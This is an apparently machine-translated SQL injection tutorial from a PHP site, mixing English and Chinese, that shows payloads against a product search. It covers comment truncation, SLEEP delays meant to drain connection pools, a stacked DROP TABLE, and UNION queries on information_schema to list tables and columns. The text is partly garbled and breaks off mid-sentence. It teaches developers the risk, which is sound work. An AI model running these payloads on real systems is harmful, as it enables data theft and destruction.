Quickly understand the basic principles of sql injection

##Basic Principles of SQL Injection

WEB technology is developing rapidly, but the traditional craft of spelling SQL with bare hands is still favored by quite a few developers. After all, compared to learning a complex set of ORM rules, doing it by hand is more convenient and intuitive. Usually people who write SQL by themselves should have heard that

SQL injection is dangerous, but they always think to themselves: My SQL statement is so simple that it cannot be injected.

Take 5 minutes to read this complete example. From now on, you should never dare to take any chances.

Simple scenario

There is a WEB interface that provides input of product names and displays corresponding price, production date and production location information. For example, enter Hammer display:

ProductPricePlace of productionDate of productionClaw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11##We skipped the process of building a web search interface, Focus directly on the key parts: SQL injection

. If we want to realize the above function, then we can roughly guess that the SQL statement used by the server is as follows:

SELECT ? FROM ? WHERE ? LIKE '%Hammer%';

where? means that we currently do not know the specific table name and field name, and this SQL is unique What can be manipulated is the input content inside single quotes '%Hammer%'. If we directly enter a single quote in the search box. That is, it becomes

select ? from ? where ? Like '%'%';

. After splicing like this, it will cause a SQL syntax error and no results will be obtained. We need to use

--

to comment out the last single quote. <pre class="brush:sql;toolbar:false;">select ? from ? where ? Like &amp;#39;%&amp;#39;; -- %&amp;#39;;</pre>

--

is followed by the comment content (you can also use #), so that you can get all the product information. So far, I still haven’t smelled it. Danger signal.

##ProductPricePlace of productionDate of productionClaw Hammer12.98American2019.11.07Club Hammer29.98Canada2019.11.11Paring Knife10.98China2019.11.11Boning Knife19.98China2019.01.01Try it off and

Hold on to the expandable single quote part in the previous step. Let’s try a simple delay statement:

select ? from ? where ? Like '%Hammer%' and 1 = SLEEP(2); -- %';

At this time, the query will take 2 seconds to return the result. If the time is extended, use the script to query several times, and the database connection pool can be restored in one go. run out.

Of course, there are even more destructive ones!

select ? from ? where ? Like '%Hammer%'; drop table xxxx; -- %';

You can directly delete the table/database. As for how to know which tables are in the database (that is, how to determine xxxx in the previous SQL sentence)?

Do whatever you want union

We need to know what tables this database has! Only in this way can you get useful information.

You can use union to put the contents of different tables together. Give it a try:

select ?,?,?,? from ? where ? Like '%Hammer%' UNION (select 1,2,3,4 from dual); -- %';

##ProductPriceClaw Hammer12.9829.982

Place of production

Date of production

American

2019.11.07

Club Hammer

Canada

2019.11.11

1

3

4

可以看到我们把假数据1，2，3，4成功地拼接到搜索结果中。

Mysql系统自带的信息都存在information_schema数据库中。我们试着在里面找找有用的信息。

select ? from ? where ? Like '%Hammer%' UNION (select TABLE_NAME,TABLE_SCHEMA,3,4 from information_schema.tables); -- %';

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
authors	hawkeye	3	4
products	hawkeye	3	4
user	hawkeye	3	4
....	....	3	4

现在知道了这些数据库名和表名，所有人都对它为所欲为了！(包括上面执行的DROP)。

看着列表一猜就能知道我们目前查的是products表，接下来我们再把products具体的字段也挖出来。

select ? from ? where ? Like '%Hammer%' UNION (select COLUMN_NAME,TABLE_SCHEMA,3,4 from imformation_schema.columns where table_name = 'products'); -- %';

产品	价格	生产地	生产日期
Claw Hammer	12.98	American	2019.11.07
Club Hammer	29.98	Canada	2019.11.11
id	hawkeye	3	4
name	hawkeye	3	4
price	hawkeye	3	4
address	hawkeye	3	4
updated_at	hawkeye	3	4

所以，通过上面2步，我们知道了表名和字段名，那么查询API的完整SQL应该是(把上面的?都补全啦)：

select name,price,address,updated_at from products where name like '%Hammer%';

通过不断重复以上几个步骤，你就可以通过这一个小小的入口把数据库的所有信息(比如上面发现的user表

The above is the detailed content of Quickly understand the basic principles of sql injection. For more information, please follow other related articles on the PHP Chinese website!